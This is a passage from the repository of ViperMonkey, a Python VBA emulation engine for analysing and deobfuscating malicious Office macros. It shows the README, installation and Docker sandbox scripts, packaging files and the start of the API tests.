├── .github
│   └── ISSUE_TEMPLATE
│       ├── bug_report.md
│       └── feature_request.md
├── .gitignore
├── README.md
├── docker
│   └── dockermonkey.sh
├── docs
│   └── APITutorial.md
├── requirements.txt
├── setup.cfg
├── setup.py
├── tests
│   ├── test_api.py
│   ├── test_bugs.py
│   ├── test_deobfuscation.py
│   └── test_expressions.py
└── vipermonkey
    ├── .prospector.yaml
    ├── __init__.py
    ├── api.py
    ├── core
    │   ├── .prospector.yaml
    │   ├── __init__.py
    │   ├── antlr_vba
    │   │   ├── __init__.py
    │   │   ├── antlr4.bat
    │   │   ├── grun.bat
    │   │   ├── makevba.bat
    │   │   ├── testvba.py
    │   │   └── vba.g4
    │   ├── comments_eol.py
    │   ├── curses_ascii.py
    │   ├── deobfuscation.py
    │   ├── excel.py
    │   ├── expressions.py
    │   ├── filetype.py
    │   ├── from_unicode_str.py
    │   ├── function_call_visitor.py
    │   ├── function_defn_visitor.py
    │   ├── function_import_visitor.py
    │   ├── identifiers.py
    │   ├── let_statement_visitor.py
    │   ├── lhs_var_visitor.py
    │   ├── lib_functions.py
    │   ├── literals.py
    │   ├── logger.py
    │   ├── loop_transform.py
    │   ├── meta.py
    │   ├── modules.py
    │   ├── operators.py
    │   ├── procedures.py
    │   ├── read_ole_fields.py
    │   ├── reserved.py
    │   ├── statements.py
    │   ├── strip_lines.py
    │   ├── stubbed_engine.py
    │   ├── tagged_block_finder_visitor.py
    │   ├── utils.py
    │   ├── var_defn_visitor.py
    │   ├── var_in_expr_visitor.py
    │   ├── vb_str.py
    │   ├── vba_constants.py
    │   ├── vba_context.py
    │   ├── vba_library.py
    │   ├── vba_lines.py
    │   ├── vba_object.py
    │   └── visitor.py
    ├── export_all_excel_sheets.py
    ├── export_doc_text.py
    ├── v_test.py
    ├── vbashell.py
    └── vmonkey.py

/.github/ISSUE_TEMPLATE/bug_report.md: -------------------------------------------------------------------------------- 1 | --- 2 | name: Bug report 3 | about: Create a report to help us improve 4 | 5 | --- 6 | 7 | **Describe the bug** 8 | A clear and concise description of what the bug is. 9 | 10 | **To Reproduce** 11 | Steps to reproduce the behavior: 12 | 1. Go to '...' 13 | 2. Click on '....' 14 | 3. Scroll down to '....' 15 | 4. See error 16 | 17 | **Expected behavior** 18 | A clear and concise description of what you expected to happen.
19 | 20 | **Screenshots** 21 | If applicable, add screenshots to help explain your problem. 22 | 23 | **Desktop (please complete the following information):** 24 | - OS: [e.g. iOS] 25 | - Browser [e.g. chrome, safari] 26 | - Version [e.g. 22] 27 | 28 | **Smartphone (please complete the following information):** 29 | - Device: [e.g. iPhone6] 30 | - OS: [e.g. iOS8.1] 31 | - Browser [e.g. stock browser, safari] 32 | - Version [e.g. 22] 33 | 34 | **Additional context** 35 | Add any other context about the problem here. 36 | -------------------------------------------------------------------------------- /.github/ISSUE_TEMPLATE/feature_request.md: -------------------------------------------------------------------------------- 1 | --- 2 | name: Feature request 3 | about: Suggest an idea for this project 4 | 5 | --- 6 | 7 | **Is your feature request related to a problem? Please describe.** 8 | A clear and concise description of what the problem is. Ex. I'm always frustrated when [...] 9 | 10 | **Describe the solution you'd like** 11 | A clear and concise description of what you want to happen. 12 | 13 | **Describe alternatives you've considered** 14 | A clear and concise description of any alternative solutions or features you've considered. 15 | 16 | **Additional context** 17 | Add any other context or screenshots about the feature request here. 
18 | -------------------------------------------------------------------------------- /.gitignore: -------------------------------------------------------------------------------- 1 | # Created by .ignore support plugin (hsz.mobi) 2 | ### Python template 3 | # Byte-compiled / optimized / DLL files 4 | __pycache__/ 5 | *.py[cod] 6 | *$py.class 7 | 8 | # C extensions 9 | *.so 10 | 11 | # Distribution / packaging 12 | .Python 13 | env/ 14 | build/ 15 | develop-eggs/ 16 | dist/ 17 | downloads/ 18 | eggs/ 19 | .eggs/ 20 | lib/ 21 | lib64/ 22 | parts/ 23 | sdist/ 24 | var/ 25 | *.egg-info/ 26 | .installed.cfg 27 | *.egg 28 | 29 | # PyInstaller 30 | # Usually these files are written by a python script from a template 31 | # before PyInstaller builds the exe, so as to inject date/other infos into it. 32 | *.manifest 33 | *.spec 34 | 35 | # Installer logs 36 | pip-log.txt 37 | pip-delete-this-directory.txt 38 | 39 | # Unit test / coverage reports 40 | htmlcov/ 41 | .tox/ 42 | .coverage 43 | .coverage.* 44 | .cache 45 | nosetests.xml 46 | coverage.xml 47 | *,cover 48 | .hypothesis/ 49 | 50 | # Translations 51 | *.mo 52 | *.pot 53 | 54 | # Django stuff: 55 | *.log 56 | local_settings.py 57 | 58 | # Flask stuff: 59 | instance/ 60 | .webassets-cache 61 | 62 | # Scrapy stuff: 63 | .scrapy 64 | 65 | # Sphinx documentation 66 | docs/_build/ 67 | 68 | # PyBuilder 69 | target/ 70 | 71 | # IPython Notebook 72 | .ipynb_checkpoints 73 | 74 | # pyenv 75 | .python-version 76 | 77 | # celery beat schedule file 78 | celerybeat-schedule 79 | 80 | # dotenv 81 | .env 82 | 83 | # virtualenv 84 | venv/ 85 | ENV/ 86 | 87 | # Spyder project settings 88 | .spyderproject 89 | 90 | # Rope project settings 91 | .ropeproject 92 | 93 | # PyCharm 94 | .idea/ 95 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | ViperMonkey 2 | =========== 3 | 4 | ViperMonkey is a VBA Emulation 
engine written in Python, designed to analyze 5 | and deobfuscate malicious VBA Macros contained in Microsoft Office files 6 | (Word, Excel, PowerPoint, Publisher, etc.). 7 | 8 | See the article "[Using VBA Emulation to Analyze Obfuscated Macros](http://decalage.info/vba_emulation)" 9 | for real-life examples of malware deobfuscation with ViperMonkey. 10 | 11 | ViperMonkey was also demonstrated at the Black Hat Europe 2019 conference: 12 | see the [slides](https://decalage.info/en/bheu2019) 13 | and [video](https://youtu.be/l5sMPGjtKn0?list=PLH15HpR5qRsXiPOP3gxN6ultoj0rAR6Yn&t=1118) (at 18:38). 14 | 15 | ViperMonkey was created by [Philippe Lagadec](https://github.com/decalage2) in 2015-2016, and the project 16 | is maintained in the repository https://github.com/decalage2/ViperMonkey. 17 | Since November 2017, most of the development has been done by [Kirk Sayre](https://github.com/kirk-sayre-work) 18 | and other contributors in the repository https://github.com/kirk-sayre-work/ViperMonkey. 19 | The main repository is synchronised regularly, but cutting-edge improvements are usually 20 | available first in Kirk's version. 21 | 22 | **Quick links:** 23 | [Report Issues/Suggestions/Questions](https://github.com/decalage2/ViperMonkey/issues) - 24 | [Contact the Author](http://decalage.info/contact) - 25 | [Repository](https://github.com/decalage2/ViperMonkey) - 26 | [Updates on Twitter](https://twitter.com/decalage2) - 27 | [API Tutorial](docs/APITutorial.md) 28 | 29 | 30 | **DISCLAIMER**: 31 | - ViperMonkey is an experimental VBA Engine targeted at analyzing maldocs. It works on some, but not all, maldocs. 32 | - VBA parsing and emulation are *extremely* slow for now (see the Speedup section for how to improve the speed). 33 | - VBA Emulation is hard and complex, because of all the features of the VBA language, of Microsoft 34 | Office applications, and all the DLLs and ActiveX objects that can be called from VBA.
35 | - This open-source project is only developed in my scarce spare time, so do not expect 36 | miracles. Any help from you will be much appreciated! 37 | 38 | Download and Install: 39 | --------------------- 40 | 41 | **Easy Install** 42 | 43 | 1. Install docker. 44 | 2. Run `docker/dockermonkey.sh MYFILE` to analyze file MYFILE. 45 | 46 | dockermonkey.sh will automatically pull down a preconfigured docker container, update ViperMonkey to 47 | the latest version in the container, and then analyze MYFILE by running ViperMonkey in the 48 | container. No other packages need to be installed and no other configuration is required. 49 | 50 | For information on using dockermonkey.sh, run `docker/dockermonkey.sh -h`. 51 | 52 | **Installation using PyPy (recommended)** 53 | 54 | For performance reasons, it is highly recommended to use PyPy (5x faster), but it is 55 | also possible to run ViperMonkey with the normal Python interpreter 56 | (CPython) if you cannot use PyPy. 57 | 58 | 1. If PyPy is not installed on your system, see http://pypy.org/download.html and download **PyPy 2.7** (not 3.x). 59 | 2. Check if pip is installed for pypy: run `pypy -m pip` 60 | 3. If pip is not installed yet, run `pypy -m ensurepip` on Windows, or `sudo -H pypy -m ensurepip` on Linux/Mac 61 | 4. Make sure pip is up-to-date, by running `pypy -m pip install -U pip` 62 | 5. Download the archive from the repository: https://github.com/decalage2/ViperMonkey/archive/master.zip 63 | 6. Extract it in the folder of your choice, and open a shell/cmd window in that folder. 64 | 7. Under Ubuntu, install pypy-dev (`sudo apt-get install pypy-dev`). 65 | 8. Install dependencies by running `pypy -m pip install -U -r requirements.txt` on Windows, or `sudo -H pypy -m pip install -U -r requirements.txt` on Linux/Mac 66 | 9. Check that ViperMonkey runs without error: `pypy vipermonkey/vmonkey.py` 67 | 68 | **Installation using CPython** 69 | 70 | 1. Make sure you have the latest Python 2.7 installed: https://www.python.org/downloads/ 71 | 2.
If you have both Python 2 and 3 versions installed, use `pip2` instead of `pip` in the 72 | following commands, to install in Python 2 and not 3. 73 | 3. Make sure pip is up-to-date, by running `pip install -U pip` 74 | 4. Use pip to download and install vipermonkey with all its dependencies, 75 | by running the following command on Windows: 76 | ``` 77 | pip install -U https://github.com/decalage2/ViperMonkey/archive/master.zip 78 | ``` 79 | On Linux/Mac: 80 | ``` 81 | sudo -H pip install -U https://github.com/decalage2/ViperMonkey/archive/master.zip 82 | ``` 83 | 5. Check that ViperMonkey runs without error: open a shell/cmd window 84 | in any directory, and simply run `vmonkey` 85 | 86 | 87 | Usage: 88 | ------ 89 | 90 | To run ViperMonkey in a Docker container with the `-s`, `--jit`, and 91 | `--iocs` options, run: 92 | 93 | ```text 94 | docker/dockermonkey.sh <file> 95 | ``` 96 | 97 | To parse and interpret VBA macros from a document, use the vmonkey script: 98 | 99 | ```text 100 | vmonkey.py <file> 101 | ``` 102 | 103 | To make analysis faster (see the Speedup section), run: 104 | 105 | ```text 106 | pypy vmonkey.py -s <file> 107 | ``` 108 | 109 | *Note:* It is recommended to always use the `-s` option. When given 110 | the `-s` option, ViperMonkey modifies some difficult-to-parse Visual 111 | Basic language constructs so that the ViperMonkey parser can 112 | correctly parse the input. 113 | 114 | If the output is too verbose and too slow, you may reduce the logging level using the 115 | `-l` option: 116 | 117 | ```text 118 | vmonkey.py -l warning <file> 119 | ``` 120 | 121 | If the sample being analyzed has long-running loops that are causing 122 | emulation to be unacceptably slow, use the `--jit` option to convert 123 | VB loops directly to Python in a JIT fashion during emulation. 124 | 125 | ```text 126 | vmonkey.py --jit <file> 127 | ``` 128 | 129 | *Note:* ViperMonkey's Python JIT loop conversion converts VB loops to 130 | Python and runs `eval` on the generated Python code.
While the Python 131 | conversion process is based on the parsed AST (not directly on the VB 132 | text) and VB data values are escaped/converted/modified to become 133 | valid in Python, any use of `eval` in Python potentially introduces a 134 | security risk. If this is a concern, the `dockermonkey.sh` script can be 135 | used to run ViperMonkey in a sandboxed manner. `dockermonkey.sh` runs 136 | ViperMonkey in a fresh Docker container on each run (no file system 137 | modifications persist between runs) and networking is turned off in 138 | the Docker container. 139 | 140 | Sometimes a malicious VBScript or Office file generates IOCs 141 | during execution that are never used, or whose use ViperMonkey does 142 | not observe. These intermediate IOCs are tracked by ViperMonkey during the 143 | emulation process and can be reported with the `--iocs` option. 144 | 145 | ```text 146 | vmonkey --iocs <file> 147 | ``` 148 | 149 | Note that one kind of intermediate IOC reported by ViperMonkey is 150 | injected shell code bytes. If the sample under analysis performs 151 | process injection directly in VB, ViperMonkey will report the injected 152 | byte values as an intermediate IOC with the `--iocs` flag. These byte 153 | values can then be written into a raw shell code file which can be 154 | further analyzed with a shell code emulator. 155 | 156 | **oletools Version** 157 | 158 | ViperMonkey requires a recent version of 159 | [oletools](https://github.com/decalage2/oletools), at least v0.56.1 (see requirements.txt for the supported range). Either install the most recent oletools 160 | version by running `pip install -U oletools`, make sure 161 | the most recent oletools install directory appears in PYTHONPATH, or 162 | install the most recent development version of oletools using pip as described 163 | [here](https://github.com/decalage2/oletools/wiki/Install#how-to-install-the-latest-development-version).
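A small version check can confirm that the oletools installed for a given interpreter falls inside the range pinned in requirements.txt (`oletools>=0.56.1,<=0.60.1`). The sketch below is not part of ViperMonkey, and `parse_version`, `oletools_version_ok` and `installed_version` are hypothetical helper names. The parser only understands plain dotted numeric versions, so suffixes such as `dev` are not handled precisely. Run the check with the same interpreter (`pypy` or `python`) you use for ViperMonkey, because each interpreter has its own installed packages.

```python
"""Hypothetical helper (not part of ViperMonkey): check the installed oletools
version against the range pinned in requirements.txt."""


def parse_version(text):
    """Convert a dotted version such as '0.56.1' into a tuple like (0, 56, 1).

    Only the leading digits of each dot-separated piece are kept, so a
    piece like '1dev' is read as 1 and a non-numeric piece is read as 0.
    """
    parts = []
    for piece in text.split("."):
        digits = ""
        for ch in piece:
            if not ch.isdigit():
                break
            digits += ch
        parts.append(int(digits) if digits else 0)
    return tuple(parts)


def oletools_version_ok(version, minimum="0.56.1", maximum="0.60.1"):
    """Return True if minimum <= version <= maximum (defaults taken from requirements.txt)."""
    return parse_version(minimum) <= parse_version(version) <= parse_version(maximum)


def installed_version(package):
    """Return the installed version string of a package, or None if it is not installed."""
    try:
        # Available on Python 3.8+.
        from importlib.metadata import version, PackageNotFoundError
    except ImportError:
        # Python 2.7 (the interpreter ViperMonkey targets): fall back to setuptools.
        import pkg_resources
        try:
            return pkg_resources.get_distribution(package).version
        except pkg_resources.DistributionNotFound:
            return None
    try:
        return version(package)
    except PackageNotFoundError:
        return None


if __name__ == "__main__":
    found = installed_version("oletools")
    if found is None:
        print("oletools is not installed for this interpreter")
    elif oletools_version_ok(found):
        print("oletools %s is within the supported range" % found)
    else:
        print("oletools %s is outside the range pinned in requirements.txt" % found)
```

Tuples are compared element by element, so `(0, 58)` sorts between `(0, 56, 1)` and `(0, 60, 1)` as expected. A stricter check could use a full version-parsing library instead.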
164 | 165 | **Speedup** 166 | 167 | ***pypy*** 168 | 169 | The parsing library used by default in ViperMonkey can take a long 170 | time to parse some samples. ViperMonkey can be sped up considerably (~5 171 | times faster) by running ViperMonkey using [pypy](https://pypy.org/) 172 | rather than the regular Python interpreter. To use pypy, do the 173 | following: 174 | 175 | 1. Install pypy following the instructions [here](https://pypy.org/download.html). 176 | 2. Install the following Python packages. This can be done by 177 | downloading the .tar.gz for each package and running 'sudo pypy 178 | setup.py install' (note the use of pypy rather than python) for 179 | each package. 180 | 1. [setuptools](https://pypi.python.org/pypi/setuptools) 181 | 2. [colorlog](https://pypi.python.org/pypi/colorlog) 182 | 3. [olefile](https://pypi.python.org/pypi/olefile) 183 | 4. [prettytable](https://pypi.python.org/pypi/PrettyTable) 184 | 5. [pyparsing](https://pypi.python.org/pypi/pyparsing/2.2.0) 185 | 186 | ***Stripping Useless Statements*** 187 | 188 | The `-s` ViperMonkey command-line option tells ViperMonkey to strip out 189 | useless statements from the Visual Basic macro code prior to parsing 190 | and emulation. For some maldocs, this can significantly speed up 191 | analysis. 192 | 193 | **Emulating File Writes** 194 | 195 | ViperMonkey emulates some file writing behavior. The SHA256 hash of 196 | each dropped file is reported in the ViperMonkey analysis results, and the 197 | actual dropped files are saved in the directory MALDOC_artifacts/, 198 | where MALDOC is the name of the analyzed maldoc file. 199 | 200 | ViperMonkey also searches Office 97 and Office 2007+ files for 201 | embedded PE files. These are automatically extracted and reported as 202 | dropped files in the MALDOC_artifacts/ directory.
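To review what an emulation run dropped, you can walk the artifacts directory and re-hash each file. This makes it easy to match the files on disk against the SHA256 values in the analysis results. The sketch below is not a ViperMonkey API, and `list_dropped_files` is a hypothetical helper. It assumes the directory is named by appending `_artifacts` to the analyzed file's path, as `dockermonkey.sh` does with `/root/${file_basename}_artifacts/`. Adjust the path if your run wrote the directory elsewhere.

```python
import hashlib
import os
import sys


def list_dropped_files(maldoc_path):
    """Map each file under <maldoc_path>_artifacts/ to its SHA256 hex digest.

    The directory layout is an assumption based on dockermonkey.sh;
    an empty dict is returned if the directory does not exist.
    """
    artifacts_dir = maldoc_path + "_artifacts"
    hashes = {}
    if not os.path.isdir(artifacts_dir):
        return hashes
    for root, _dirs, files in os.walk(artifacts_dir):
        for name in sorted(files):
            full_path = os.path.join(root, name)
            digest = hashlib.sha256()
            # Hash in chunks so large dropped payloads are never fully loaded into memory.
            with open(full_path, "rb") as handle:
                for chunk in iter(lambda: handle.read(65536), b""):
                    digest.update(chunk)
            hashes[os.path.relpath(full_path, artifacts_dir)] = digest.hexdigest()
    return hashes


if __name__ == "__main__" and len(sys.argv) > 1:
    # Usage: python <script> MALDOC  -> one "sha256  relative/path" line per dropped file.
    for path, sha256 in sorted(list_dropped_files(sys.argv[1]).items()):
        print("%s  %s" % (sha256, path))
```

The helper only reads the dropped files as bytes and never executes them. Keys are paths relative to the artifacts directory, so files extracted into subdirectories keep their relative location.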
203 | 204 | **Emulating Specific VBA Functions** 205 | 206 | By default ViperMonkey emulates maldoc behavior starting from the standard 207 | macro auto run functions (like AutoOpen, Document_Open, Document_Close, 208 | etc.). In some cases you may want to emulate the behavior starting 209 | from a non-standard auto run function. This is supported via the `-i` 210 | command-line option. To emulate maldoc behavior starting from function 211 | Foo, use the command line option '-i Foo'. To emulate behavior 212 | starting from multiple non-standard entry points, use the command line 213 | option '-i "Foo,Bar,Baz"' (note that the entry point function names 214 | are comma-separated and must appear in a double-quoted string). 215 | 216 | 217 | [//]: # (Home page http://www.decalage.info/vipermonkey) 218 | [//]: # (Documentation https://github.com/decalage2/ViperMonkey/wiki) 219 | [//]: # (Download/Install https://github.com/decalage2/ViperMonkey/wiki/Install) 220 | 221 | 222 | API Interface: 223 | -------------- 224 | 225 | ViperMonkey also includes a Python API that can be used for 226 | finer-grained control over the emulation of your sample or for integration 227 | into an existing project. 228 | 229 | Please see the [API Tutorial](docs/APITutorial.md) for more information. 230 | 231 | 232 | News 233 | ---- 234 | 235 | - **2018-03-22 v0.06**: new features and bug fixes contributed by Kirk Sayre 236 | - 2018-3: 237 | - Added support for parsing some technically invalid VBA statements. 238 | - Additional parsing fixes. 239 | - Added support for starting emulation at non-standard functions. 240 | - 2018-2: 241 | - Added support for Environ, IIf, Base64DecodeString, CLng, Close, Put, Run, InStrRev, 242 | LCase, RTrim, LTrim, AscW, AscB, and CurDir functions. 243 | - 2018-1: 244 | - Added emulation support for saving dropped files. 245 | - Added support for For Each loops. 246 | - Added support for While Wend loops. 247 | - Handle 'Exit Do' instructions.
248 | - 2018-01-12 v0.05: a lot of new features and bug fixes contributed by Kirk Sayre 249 | - 2017-12-15: 250 | - Added support for Select and Do loops. 251 | - Added support for 'End Sub' and zero-argument return statements. 252 | - Added support for #if constructs. 253 | - Each VBA stream is now parsed in a separate thread (up to the number of machine cores). 254 | - 2017-11-28: 255 | - Added parsing for private type declarations. 256 | - Report calls to CreateProcessA in final report. 257 | - Handle Application.Run() of locally defined methods. 258 | - 2017-11-23: 259 | - Added VBA functions Abs, Fix, Hex, String, CByte, Atn, Dir, RGB, Log, Cos, Exp, Sin, Str, and Val. 260 | - Added support for the 'Exit Function' statement. 261 | - Changed math operators to also work with string representations of integers. 262 | - Added a configurable iteration limit on loops. 263 | - 2017-11-14: 264 | - Added support for InStr, Replace, Sgn, Sqr, UBound, LBound, Trim, StrConv, Split, StrReverse, and Int VB functions. 265 | - Added support for string character subscripting. 266 | - Added support for negative integer literals. 267 | - Added support for if-then-else statements. 268 | - Added support for Const and initial values for global variable declarations. 269 | - Handle assignments of boolean expressions to variables. 270 | - 2017-11-03: 271 | - Added support for Left(), Right(), Array(), and BuiltInDocumentProperties() functions. 272 | - Added support for global variables. 273 | - Fixed some parse errors. 274 | - Added analysis of AutoClose() functions. 275 | - 2016-09-26 v0.02: First published version 276 | - 2015-02-28 v0.01: [First development version](https://twitter.com/decalage2/status/571778745222242305) 277 | - see changelog in source code for more info. 278 | 279 | How to Suggest Improvements, Report Issues or Contribute: 280 | --------------------------------------------------------- 281 | 282 | This is a personal open-source project, developed in my spare time.
Any contribution, suggestion, feedback or bug 283 | report is welcome. 284 | 285 | To suggest improvements, report a bug or any issue, please use the 286 | [issue reporting page](https://github.com/decalage2/ViperMonkey/issues), providing all the 287 | information and files to reproduce the problem. 288 | 289 | You may also [contact the author](http://decalage.info/contact) directly to provide feedback. 290 | 291 | The code is available in [a GitHub repository](https://github.com/decalage2/ViperMonkey). You may use it 292 | to submit enhancements using forks and pull requests. 293 | 294 | License 295 | ------- 296 | 297 | This license applies to the ViperMonkey package, apart from the thirdparty folder which contains third-party files 298 | published with their own license. 299 | 300 | The ViperMonkey package is copyright (c) 2015-2020 Philippe Lagadec (http://www.decalage.info) 301 | 302 | All rights reserved. 303 | 304 | Redistribution and use in source and binary forms, with or without modification, 305 | are permitted provided that the following conditions are met: 306 | 307 | * Redistributions of source code must retain the above copyright notice, this 308 | list of conditions and the following disclaimer. 309 | * Redistributions in binary form must reproduce the above copyright notice, 310 | this list of conditions and the following disclaimer in the documentation 311 | and/or other materials provided with the distribution. 312 | 313 | THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND 314 | ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED 315 | WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE 316 | DISCLAIMED. 
IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE 317 | FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL 318 | DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR 319 | SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER 320 | CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, 321 | OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE 322 | OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 323 | 324 | -------------------------------------------------------------------------------- /docker/dockermonkey.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | if [[ $1 == "-h" || $# -eq 0 ]]; then 4 | echo "Usage: dockermonkey.sh FILE [JSON_FILE] [-i ENTRY]" 5 | echo "FILE is the VBA/VBScript file to analyze." 6 | echo "If JSON_FILE is given JSON analysis results will be saved in JSON_FILE." 7 | echo "If '-i ENTRY' is given emulation will start with VBA/VBScript function ENTRY." 8 | exit 9 | fi 10 | 11 | if [ "$(uname)" == "Darwin" ]; then 12 | echo "[*] User running on a Mac" 13 | if [ "$(docker-machine status)" == "Stopped" ]; then 14 | echo "[*] 'docker-machine' is Stopped. Starting it and instantiating the environment." 15 | docker-machine start 16 | docker-machine env 17 | eval $(docker-machine env) 18 | fi 19 | fi 20 | 21 | echo "[*] Running 'docker ps' to see if script has required privileges to run..." 22 | docker ps 23 | 24 | if [ $? -ne 0 ]; then 25 | echo "[!] 'docker ps' failed to run - you may not have the privileges to run docker. Try using sudo." 26 | exit 27 | fi 28 | 29 | if [[ $(docker ps -f status=running -f ancestor=haroldogden/vipermonkey -l | tail -n +2) ]]; then 30 | echo "[+] Other ViperMonkey containers are running!" 31 | fi 32 | 33 | echo "[*] Pulling and starting container..." 
34 | docker pull haroldogden/vipermonkey:latest 35 | docker_id=$(docker run --rm -d -t haroldogden/vipermonkey:latest) 36 | 37 | echo "[*] Attempting to copy file $1 into container ID $docker_id" 38 | 39 | file_basename=$(basename "$1") 40 | 41 | # TODO: Remove this after base Docker image is updated. 42 | #echo "[*] Installing exiftool..." 43 | #docker exec $docker_id sh -c 'apt-get install -y libimage-exiftool-perl' 44 | 45 | echo "[*] Starting openoffice listener for file content conversions..." 46 | docker exec $docker_id sh -c '/usr/lib/libreoffice/program/soffice.bin --headless --invisible --nocrashreport --nodefault --nofirststartwizard --nologo --norestore --accept="socket,host=127.0.0.1,port=2002,tcpNoDelay=1;urp;StarOffice.ComponentContext" &' 47 | 48 | echo "[*] Checking for ViperMonkey and dependency updates..." 49 | docker exec $docker_id sh -c "cd /opt;for d in *; do cd \$d; git pull > /dev/null 2>&1; cd /opt; done" 50 | 51 | echo "[*] Disabling network connection for container ID $docker_id" 52 | docker network disconnect bridge $docker_id 53 | 54 | docker cp "$1" "$docker_id:/root/$file_basename" 55 | 56 | # Figure out arguments. 57 | entry="" 58 | json="" 59 | json_file="" 60 | 61 | # Entry point with no JSON file? 62 | if [[ $# -ge 3 && $2 == "-i" ]]; then 63 | entry="-i $3" 64 | elif [ $# -eq 2 ]; then 65 | # Just JSON file. 66 | json="-o /root/report.json" 67 | json_file=$2 68 | fi 69 | 70 | # JSON file with entry point? 71 | if [[ $# -ge 4 && $3 == "-i" ]]; then 72 | entry="-i $4" 73 | json="-o /root/report.json" 74 | json_file=$2 75 | fi 76 | 77 | # Run ViperMonkey in the docker container. 78 | docker exec $docker_id sh -c "/opt/ViperMonkey/vipermonkey/vmonkey.py -s --ioc --jit '/root/$file_basename' $json $entry" 79 | 80 | # Copy out the JSON analysis report if needed. 81 | if [ "$json_file" != "" ]; then 82 | docker cp "$docker_id:/root/report.json" "$json_file" 83 | fi 84 | 85 | # Zip up dropped files if there are any. 
86 | docker exec $docker_id sh -c "touch /root/test.zip ; [ -d \"/root/${file_basename}_artifacts/\" ] && zip -r --password=infected - /root/${file_basename}_artifacts/ > /root/test.zip" 87 | docker cp "$docker_id:/root/test.zip" test.zip 88 | if [ ! -s test.zip ]; then rm test.zip; else mv test.zip ${file_basename}_artifacts.zip; echo "[*] Dropped files are in ${file_basename}_artifacts.zip"; fi 89 | 90 | echo "[*] Done - Killing docker container $docker_id" 91 | docker stop $docker_id > /dev/null 92 | -------------------------------------------------------------------------------- /requirements.txt: -------------------------------------------------------------------------------- 1 | oletools>=0.56.1,<=0.60.1 # oletools from 0.54.2 to 0.56 required cryptography, incompatible with PyPy. oletools 0.56.1+ does not require it anymore. 2 | olefile 3 | prettytable 4 | colorlog 5 | colorama 6 | pyparsing==2.2.0 # pyparsing 2.4.0 triggers a MemoryError on some samples (issue #58). pyparsing 2.3.0 parses some constructs differently and breaks things. 7 | xlrd2 8 | xlrd 9 | unidecode==1.2.0 10 | # regex is not installable on PyPy+Windows, so we only require it if the platform is not Windows or not PyPy: 11 | regex ; platform_python_implementation!="PyPy" or platform_system!="Windows" 12 | -------------------------------------------------------------------------------- /setup.cfg: -------------------------------------------------------------------------------- 1 | [aliases] 2 | test=pytest 3 | -------------------------------------------------------------------------------- /setup.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | """ 3 | Installs ViperMonkey using pip, setuptools or distutils 4 | 5 | To install this package, run: 6 | pip install -e . 7 | 8 | Or: 9 | python setup.py install 10 | 11 | Installation using pip is recommended, to create scripts to run vmonkey 12 | and vbashell from any directory. 
13 | """ 14 | 15 | #--- CHANGELOG ---------------------------------------------------------------- 16 | 17 | # 2016-12-14 v0.04 PL: - replaced scripts by entry points (issue #17) 18 | # 2018-08-17 v0.07 PL: - added required dependency unidecode 19 | # 2021-04-10 v1.0.3 PL: - changed oletools version to >=0.56.1 20 | 21 | #--- TODO --------------------------------------------------------------------- 22 | 23 | 24 | #--- IMPORTS ------------------------------------------------------------------ 25 | 26 | try: 27 | from setuptools import setup 28 | except ImportError: 29 | from distutils.core import setup 30 | 31 | # --- ENTRY POINTS ------------------------------------------------------------ 32 | 33 | # Entry points to create convenient scripts automatically 34 | 35 | entry_points = { 36 | 'console_scripts': [ 37 | 'vmonkey=vipermonkey.vmonkey:main', 38 | 'vbashell=vipermonkey.vbashell:main', 39 | ], 40 | } 41 | 42 | 43 | setup( 44 | name="vipermonkey", 45 | version="1.0.3", 46 | description=( 47 | "ViperMonkey is a VBA Emulation engine written in Python, designed to " 48 | "analyze and deobfuscate malicious VBA Macros contained in Microsoft " 49 | "Office files (Word, Excel, PowerPoint, Publisher, etc)."), 50 | long_description=open("README.md").read(), 51 | install_requires=[ 52 | # oletools from 0.54.2 to 0.56 required cryptography, incompatible with PyPy. oletools 0.56.1+ does not require it anymore. 53 | # Moreover, oletools 0.56.1+ does not trigger antivirus false positives anymore 54 | 'oletools >= 0.56.1', 55 | "olefile", 56 | "prettytable", 57 | "colorlog", 58 | "colorama", 59 | "pyparsing==2.2.0", # pyparsing 2.4.0 triggers a MemoryError on some samples (issue #58). pyparsing 2.3.0 parses some constructs differently and breaks things. 
60 | "unidecode==1.2.0", 61 | "xlrd", 62 | # regex is not installable on PyPy+Windows, so we only require it if the platform is not Windows or not PyPy: 63 | 'regex; platform_python_implementation!="PyPy" or platform_system!="Windows"', 64 | ], 65 | packages=["vipermonkey", "vipermonkey.core"], 66 | setup_requires=["pytest-runner"], 67 | tests_require=["pytest"], 68 | entry_points=entry_points, 69 | author="Philippe Lagadec", 70 | url="https://github.com/decalage2/ViperMonkey", 71 | license="BSD", 72 | download_url="https://github.com/decalage2/ViperMonkey", 73 | ) 74 | -------------------------------------------------------------------------------- /tests/test_api.py: -------------------------------------------------------------------------------- 1 | """Tests to ensure our API works as described in documentation.""" 2 | 3 | from textwrap import dedent 4 | 5 | import pytest 6 | 7 | import vipermonkey 8 | from vipermonkey.core import * 9 | 10 | 11 | def test_basic_eval(): 12 | assert vipermonkey.eval('2') == 2 13 | assert vipermonkey.eval('2 + 2') == 4 14 | assert vipermonkey.eval('Chr(36)') == '$' 15 | assert vipermonkey.eval('"w" & Chr(111) & "rl" & Chr(123 Xor 31)') == 'world' 16 | assert vipermonkey.eval('Chr(71 Xor 18) & "2" & Chr(84 Xor 19)') == 'U2G' 17 | 18 | vba_code = dedent(''' 19 | Dim m1, m2, m3 As String 20 | m1 = "he" & "ll" & Chr(111) & " " 21 | m2 = "w" & Chr(111) & "rl" & Chr(123 Xor 31) 22 | 